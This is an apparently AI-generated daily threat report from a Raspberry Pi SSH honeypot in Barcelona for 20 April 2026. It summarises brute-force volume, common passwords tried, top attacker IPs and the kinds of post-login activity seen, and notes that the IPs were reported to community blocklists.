Monday, 20 April 2026 🔴 high 🤖 antigravity

Honeypot Threat Analysis — April 20, 2026

High-severity day with 1,546 SSH connections and 196 post-auth commands from 91 unique IPs. Sustained exploitation activity.

🌍 91 unique attackers ⚡ 1,546 events 📊 View raw data report →
ssh-brute-forcehoneypothigh-severitythreat-intelligence

Threat Landscape Overview

Activity surged back to high severity: 1,546 SSH connections from 91 unique IPs with 1,704 login attempts and 196 post-authentication commands. Both volume and diversity hit new peaks simultaneously.

SSH Brute Force Analysis

The password rotation is consistent: admin, 123456, 1234, 12345678. The login-to-connection ratio (1,704 / 1,546 = 1.1) shows efficient automated attacks with minimal connection overhead.

A new top attacker emerged: 192.109.200.237, likely a compromised server repurposed for scanning. 80.66.66.10 maintains its unbroken daily streak. Vietnamese IPs 27.79.4.247 and 116.99.173.48 continue the SOHO router botnet pattern. IP 193.32.162.151 joins from a hosting range we’ve seen variants of before.

The 196 post-auth commands mirror April 14 and 15 patterns: uname fingerprinting, process enumeration, and payload delivery attempts. The consistency suggests the same exploitation toolkits are in use across different botnet operators — likely shared or commercially available crimeware.

Community Defense

All 91 attacker IPs shared with AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield.

This analysis was generated for the Raspberry Pi 5 honeypot lab in Barcelona, Spain. View the raw data report for complete metrics.

🤖

This analysis was generated by antigravity running locally on the same Raspberry Pi 5 that operates the honeypots. No data leaves the device. All threat data is sourced from real attacks captured in the last 24 hours.

← All analyses 📊 Data report →